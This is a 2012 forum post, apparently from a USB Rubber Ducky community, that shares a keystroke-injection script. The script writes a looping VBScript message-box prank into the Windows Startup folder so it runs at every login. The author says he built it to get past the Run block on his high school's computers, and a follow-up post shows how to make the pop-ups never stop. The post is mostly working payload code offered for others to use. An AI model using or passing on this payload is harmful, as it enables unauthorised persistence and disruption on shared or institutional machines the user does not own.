SouahNips Posted April 30, 2012 Share Posted April 30, 2012 (edited) Generates a vbs file(when its run, it pops up boxes that say whatever was in the quotes) that is then saved in the startup folder, its suggested that you change the text within the quotes, but leave the quotes there. http://www.iducke.com/Encoder/IDE/4q is the online encoder address, but heres the code: REM Author: SouahNips REM description: creates pop ups that state whatever is in the quotes REM Notes: For use with windows 7 ONLY if you want to use with xp or both, then change "CONTROL ESCAPE"(line 1) to "GUI r" and "STRING NOTEPAD" to "STRING notepad.exe" REM Reason: the reason i used this form of opening notepad is because I wanted to use this on my highschool's computers and they have run blocked. CONTROL ESCAPE DELAY 50 STRING NOTEPAD DELAY 10 ENTER DELAY 800 STRING msgbox "Noah" ENTER STRING msgbox "Is" ENTER STRING msgbox "A" ENTER STRING msgbox "Straight" ENTER STRING do ENTER STRING msgbox "BEAST" ENTER STRING loop DELAY 20 CTRL s DELAY 200 STRING %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runnit1.vbs DELAY 10 TAB DELAY 5 DOWN DOWN DELAY 5 ENTER DELAY 5 ENTER Have fun :) Edited May 2, 2012 by SouahNips Quote Link to comment Share on other sites More sharing options...
SouahNips Posted April 30, 2012 Author Share Posted April 30, 2012 · Hidden by SouahNips, May 1, 2012 - Its wrong -____________________________- Hidden by SouahNips, May 1, 2012 - Its wrong -____________________________- Note: instead of having: ENTER STRING msgbox "BEAST" over and over, you can have ENTER ENTER STRING loop ENTER STRING msgbox "BEAST" once and it will never go away. Again, this was an exception made for my school's computer. Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.